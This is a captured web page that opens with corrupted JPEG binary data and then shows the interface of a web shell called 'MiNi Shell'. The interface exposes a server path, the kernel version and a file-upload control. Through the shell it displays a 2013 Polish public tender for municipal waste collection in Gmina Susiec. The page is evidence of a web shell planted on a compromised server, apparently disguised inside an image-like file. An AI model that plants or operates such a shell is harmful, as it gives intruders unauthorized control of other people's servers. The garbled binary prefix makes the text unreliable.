JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130521/83419-N-2013.html

<p class="kh_header"><b>Susiec: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Susiec</b><br>
<b>Numer ogłoszenia: 83419 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Susiec , ul. Tomaszowska 2, 22-672 Susiec, woj. lubelskie, tel. 084 6654868, faks 084 6654893.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.susiec.akcessnet.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Susiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi związanej z Odbiorem i zagospodarowaniem odpadów komunalnych z terenu gminy Susiec w zakresie według poniższego opisu:  
I.	Charakterystyka gminy Susiec:
1.	Powierzchnia gminy Susiec - 190,52 km. 2
2.	Liczba miejscowości - 19
3.	Liczba posesji w poszczególnych miejscowościach:

Według zapisu:	Nazwa Miejscowości -	Liczba nieruchomości zamieszkałych -	Liczba nieruchomości niezamieszkałych na których powstają odpady komunalne
1.	Ciotusza Nowa	123	7
2.	Ciotusza Stara	  85	8
3.	Grabowica   	155	5
4.	Huta Szumy	        57	15
5.	Kunki       	   130	      5
6.	Łasochy	  28	  3
7.	Łosiniec	166	10
8.	Łuszczacz	114	5
9.	Majdan Sopocki Pierwszy 140	30
10.	Majdan Sopocki Drugi	140	40
11.	Maziły	 70	4
12.	Nowiny	 73	9
13.	Oseredek	158	5
14.	Paary	       225	6
15.	Róża   	52	3
16.	Rybnica	75	 5
17.	Susiec	388	20
18.	Wółka Łosiniecka 	108	15
19.	Zawadki 	30	5
Razem:	  2317	200

4.	Liczba mieszkańców stałych na dzień 31 grudnia 2012r. -  7 978 mieszkańców  zamieszkałych w zabudowie jednorodzinnej.
5.	Liczba gospodarstw domowych - 2317
6.	Orientacyjna długość trasy przejazdu śmieciarki w skali miesiąca to 560 km. 
7.	 Na terenie gminy Susiec obowiązywać będzie system mieszany workowo-
  pojemnikowy zbiórki odpadów komunalnych.                                                                               Niesegregowane (zmieszane) odpady komunalne -kod: 20 03 01- będą gromadzone  w pojemnikach 120 l. Pojemniki zabezpiecza Wykonawca na własny koszt i ustawi je w miejscach wskazanych przez właścicieli nieruchomości. poszczególnych nieruchomości. 
8.  Rodzaje odpadów komunalnych, w tym rodzaje selektywnie odbieranych odpadów
     komunalnych oraz częstotliwość i sposób odbierania odpadów komunalnych. 
8.1. Ustala się częstość odbioru odpadów komunalnych z terenu nieruchomości zamieszkałych, z obszarów zabudowy wielorodzinnej, obiektów użyteczności publicznej oraz pozostałych   nieruchomości niezamieszkałych: 
8.2. odpady zmieszane - nie rzadziej niż jeden raz w miesiącu,
8.3. zbierane selektywnie papier i tektura, szkło bezbarwne i kolorowe, metale - nie rzadziej  niż jeden raz na dwa miesiące,
8.4. tworzywa sztuczne i wielomateriałowe - raz na dwa miesiące,
8.5. na cmentarzach i miejscach pamięci narodowej - w miarę potrzeb, nie rzadziej niż jeden   raz na trzy miesiące,

9.Wymogi dotyczące przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów komunalnych:
9.1.	Wykonawca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany do przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów.
9.2.	Odpady, których nie udało się podać odzyskowi powinny być tak unieszkodliwiane aby składowane były wyłącznie te, których unieszkodliwienie w inny sposób było niemożliwe z przyczyn technologicznych lub nieuzasadnione z przyczyn ekologicznych lub ekonomicznych.
9.3.	Wykonawca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany do przekazywania do regionalnej instalacji do przetwarzania odpadów komunalnych jedynie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania.
9.4.	Zakazuje się mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odebranymi od właścicieli nieruchomości.
9.5.	Wykonawca odbierający odpady komunalne, w przypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, przyjmuje je jako zmieszane odpady komunalne i powiadamia o tym Gminę. 
10.Rodzaje i ilość odpadów komunalnych odbieranych selektywnie od właścicieli 
            nieruchomości z terenu gminu Susiec w skali roku:
10.1. papier i tektura - ok. 12 Mg
10.2. metale - ok. 3 Mg
10.3. tworzywa sztuczne i wielomateriałowe - ok. 30 Mg
10.4. szkło opakowaniowe bezbarwne i kolorowe - ok. 55 Mg
10.5. przeterminowane leki i chemikalia - wg potrzeb
10.6.meble i odpady wielkogabarytowe - wg potrzeb
10.7. zużyte baterie i akumulatory - wg potrzeb
10.8.zużyty sprzęt elektryczny i elektroniczny - wg potrzeb
10.9. zużyte opony - wg potrzeb,
10.10. odpady budowlane i rozbiórkowe - wg potrzeb
10.11.odpady ulegające biodegradacji - wg potrzeb.

11. Charakterystyka worków do selektywnej zbiorki odpadów:
11.1. materiał: folia polietylenowa LDPE,
11.2. pojemność: -120 l. 
11.3. kolor: żółty, niebieski, zielony i czarny.
11.4. grubość: min 0,06 mm.

12. Liczba i rodzaj pojemników do gromadzenia odpadów zmieszanych:
12.1.pojemniki o pojemności 120l. - 2 300 szt.
12.2. pojemniki o pojemności 80 l. - 217 szt. 

13. Liczba worków do selektywnej zbiórki odpadów:
13.1.żółte (opakowania z tworzyw sztucznych) -  12 000 szt. 
13.2.niebieskie (papier i tektura)  -  8 000 szt.
13.3.zielone -opakowania ze szkła  - ok. 10 000 .szt.. 
13.4.czarne -opakowania z metali  - ok. 6000 szt. 
14. Zaopatrzeniem w pojemniki do odbioru niesegregowanych (zmieszanych) odpadów    komunalnych oraz w odpowiednie worki  do zbierania selektywnie zebranych odpadów    komunalnych zajmie się Wykonawca usługi zajmującej się Odbiorem i zagospodarowaniem odpadów komunalnych z terenu gminy Susiec
												
Zaopatrzenie w pojemniki i worki może nastąpić poprzez:
1.	Sprzedaż przez wykonawcę usługi,
2.	Wydzierżawienie  przez wykonawcę usługi;
3.	Użyczenie przez wykonawcę usługi.
Ilość wytwarzanych odpadów komunalnych na terenie gminy Susiec nie jest zależna od Zamawiającego. Szacunkowa ilość odpadów przewidzianych do zbiórki i transportu wynosi ok. 400 Mg co wynika ze sprawozdań za 2012 rok. Wyżej wymienione ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb. 
15. Obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem:
   15.1.  Wykonawca będzie dostarczać Zamawiającemu raz na kwartał sprawozdanie z ilości  odebranych i poddanych unieszkodliwianiu odpadów  zgodnie z obowiązującymi w tym    zakresie przepisami. W terminie składania pierwszego sprawozdania Wykonawca    przekaże Zamawiającemu wykaz wszystkich posesji od których zostały odebrane       odpady komunalne, wraz ze wskazaniem  ilości pojemników. 
   15.2. Wykonawca zobowiązany jest do udokumentowania  osiąganych poziomów recyklingu       w szczególności następujących frakcji odpadów komunalnych:  papieru, metali,    tworzyw sztucznych  i szkła oraz osiąganego poziomu ograniczenia  masy odpadów      komunalnych ulegających biodegradacji przekazywanych do składowania.
    15.3. Wykonawca jeden raz w miesiącu przekazuje Zamawiającemu informację o ilości 
         zebranych na terenie gminy Susiec odpadów  komunalnych  zbieranych selektywnie    oraz niesegregowanych -zmieszanych- odpadów  komunalnych. 
     15.4. Wykonawca jeden raz w miesiącu przekaże Zamawiającemu wykaz zamieszkałych     nieruchomości gminy Susiec oraz  wykaz właścicieli nieruchomości, na których nie    zamieszkują na stałe mieszkańcy ale powstają odpady komunalne -działki rekreacyjne,    osoby prowadzące działalność gospodarczą-, którzy nie segregują odpadów       komunalnych oraz wykaz  nieruchomości, od których zaprzestano odbierać odpady    komunalne. 
      15.5. Wraz ze sprawozdaniem  kwartalnym Wykonawca dostarczy Zamawiającemu kopie    dowodów dostarczenia odpadów do instalacji odzysku lub unieszkodliwiania tj. karty  ewidencji odpadów lub karty przekazania odpadów.  
16. Szczegółowe wymagania stawiane przedsiębiorcom odbierającym odpady komunalne od   właścicieli nieruchomości:
16.1. Wykonawca zobowiązany jest spełniać warunki określone w Rozporządzeniu Ministra   Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie   odbierania odpadów komunalnych od właścicieli nieruchomości Dz. U. z 2013 r., poz. 122 między innymi:
a- posiadać bazę magazynowo transportową usytuowaną na terenie gminy Susiec lub 
    w  odległości nie większej niż 60 km od granicy gminy Susiec, do którego posiada tytuł  prawny Baza magazynowo - transportowa musi spełniać następujące warunki:
- teren bazy magazynowo - transportowej musi być zabezpieczony w sposób 
   uniemożliwiający wstęp osobom nieupoważnionym,
- miejsca przeznaczone do parkowania pojazdów muszą być zabezpieczone przed emisją   zanieczyszczeń do gruntu,
- miejsce magazynowania selektywnie zbieranych odpadów komunalnych musi być   
   zabezpieczone przed emisja zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem    czynników atmosferycznych,
- teren bazy musi być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie    wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie    z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne    (Dz. U. z 2012 r. poz. 145, 951 i 1513  oraz z 2013 r. poz. 21-). 				

b-baza magazynowo - transportowa powinna być wyposażona w: 
- miejsca przeznaczone do parkowania pojazdów,
- pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
- miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów
  komunalnych,- legalizowaną samochodową wagę najazdową - w przypadku gdy na ternie bazy następuje   magazynowanie odpadów.
2- Wykonawca zobowiązany jest posiadać co najmniej dwa pojazdy przystosowane do 
     odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy 
     przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co    najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej oraz samochód    dostawczy lub terenowy przystosowany do odbioru odpadów komunalnych z możliwości   wjazdu na  drogi gminne o szerokości od 2,4 m do 3,0 m i masie rzeczywistej do 5 ton. Pojazdy muszą spełniać następujące warunki:
a- posiadać trwale i czytelnie oznakowane w widocznym miejscu nazwę firmy wraz z danymi  adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne, 
b- być zarejestrowane i dopuszczone do ruchu oraz posiadać aktualne badania techniczne    i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym,
c- być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po 
   opróżnieniu pojemników,  
d)-wyposażone w monitoring bazujący na systemie pozycjonowania -GPS-umożliwiający   trwale zapisywanie przechowywanie i odczytywanie danych o położeniu pojazdu    i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku odpadów,
e- konstrukcja pojazdów musi zabezpieczać przed niekontrolowanym wydostawaniem na    zewnątrz odpadów podczas magazynowania, przeładunku a także transportu oraz 
   minimalizować oddziaływanie czynników atmosferycznych na odpady.
17. Standard sanitarny wykonywania usług oraz ochrony środowiska:
     Wykonawca obowiązany jest utrzymywać odpowiedni stan sanitarny pojazdów i urządzeń    poprzez wykonywanie następujących czynności: 
17.1. mycie i dezynfekcję z częstotliwością gwarantującą zapewnienie im właściwego stanu   Sanitarnego, nie rzadziej niż 1 raz na miesiąc, a w okresie letnim nie rzadziej niż raz na    2 tygodnie. 
17.2. opróżnianie pojazdów z odpadów i parkowanie na koniec każdego dnia roboczego 
   wyłącznie na terenie bazy magazynowo- transportowej,
17.3. dopuszcza się wyposażenie pojazdów w urządzenia do ważenia odpadów komunalnych. 
18. Zakazuje się Wykonawcy mieszania selektywnie zebranych odpadów komunalnych    z  niesegregowanymi (zmieszanymi) odpadami komunalnymi zebranymi z terenu gminy    Susiec. 
19. Wykonawca ma obowiązek  na własny koszt wyposażenia właścicieli wszystkich 
      nieruchomości objętych zbiórką  odpadów  w pojemniki  i worki niezbędne do 
     gromadzenia odpadów segregowanych przed pierwszym dniem obowiązywania umowy      na odbiór odpadów zawartej z Zamawiającym. 
20. Wykonawca ma obowiązek odbioru wszystkich odpadów komunalnych segregowanych    i niesegregowanych -zmieszanych- odpadów  komunalnych. Ilość niesegregowanych  mieszanych)odpadów komunalnych szacuje się na i około 400 Mg w skali roku.
21. Wykonawca przed podpisaniem umowy wskaże zamawiającemu  nazwę, rodzaj  i adres   instalacji do której będą dostarczane odebrane z terenu gminy Susiec odpady komunalne. 											
												
   22. Wykonawca zobowiązany jest do udokumentowania  osiąganych poziomów recyklingu      w szczególności następujących frakcji odpadów komunalnych:  papieru, metali,     tworzyw sztucznych  i szkła oraz osiąganego poziomu ograniczenia  masy odpadów   komunalnych ulegających biodegradacji przekazywanych do składowania w wysokości       określonej w przepisach Rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r.   w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku          innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz.645)                                                                                                  
Wykonawca zobowiązany będzie wykonać zamówienie zgodnie z opisem przedmiotu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości 5 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnione warunki, jeżeli wykonawca posiada  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj;
1.Aktualne  zaświadczenie o wpisie do rejestru działalności regulowanej w Gminie Susiec, zgodnie z art. 9c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach (t.j. Dz.U z 2012r., poz. 391)
2.Aktualne zezwolenia  na zbieranie odpadów oraz transport odpadów zgodnie z art. 41 ust. 3 pkt. 2 i art. 233 ust.3 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013r. poz.21)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnione warunki, jeżeli wykonawca posiada :
1.Bazę magazynowo - transportową, której wyposażenie oraz sposób funkcjonowania będzie zgodny z Rozporządzeniem Ministra Środowiska w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 203r. poz.122)
Baza musi być usytuowana na terenie gminy Susiec lub w odległości nie większej niż 60 km od granicy gminy Susiec, do której posiada tytuł prawny. Baza magazynowo - transportowa musi spełniać następujące warunki:
-teren bazy magazynowo - transportowej musi być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym,
-miejsca przeznaczone do parkowania pojazdów muszą być zabezpieczone przed emisją zanieczyszczeń do gruntu,
-miejsca magazynowania selektywnie zbieranych odpadów komunalnych  musi być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych,
-teren bazy musi być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z ternu bazy zgodnie z wymogami określonymi przepisami ustawy z dnia 18 lipca 2001r. - Prawo wodne( Dz.U. z 2012r. poz. 145, 951 i 1513 oraz z 2013r. poz. 21),
-baza magazynowo - transportowa powinna być wyposażona w: pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób, miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, legalizowaną samochodową wagę najazdową - w przypadku gdy na terenie bazy następuje magazynowanie odpadów.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia .

2. co najmniej:- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych , 2 pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, 1pojazd do odbierania odpadów  bez funkcji kompaktującej oraz samochód dostawczy lub terenowy przystosowany do odbioru odpadów komunalnych z możliwością wjazdu na drogi gminne o szerokości od 2,4 do 3,0 m i masie rzeczywistej do 5 ton. Pojazdy muszą spełniać następujące warunki:-posiadać trwałe i czytelnie oznakowane w widocznym miejscu nazwę firmy wraz z danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne, -być zarejestrowane i dopuszczone do ruchu oraz posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym,-być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników,-wyposażone w monitoring bazujący na systemie pozycjonowania (GPS) umożliwiający trwałe zapisywanie przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku odpadów,-konstrukcja pojazdu musi zabezpieczać przed niekontrolowanym wydostawaniem na zewnątrz odpadów podczas magazynowania, przeładunki a także transportu oraz minimalizować oddziaływanie czynników atmosferycznych na odpady.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.
Spełnienie warunku udziału - na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
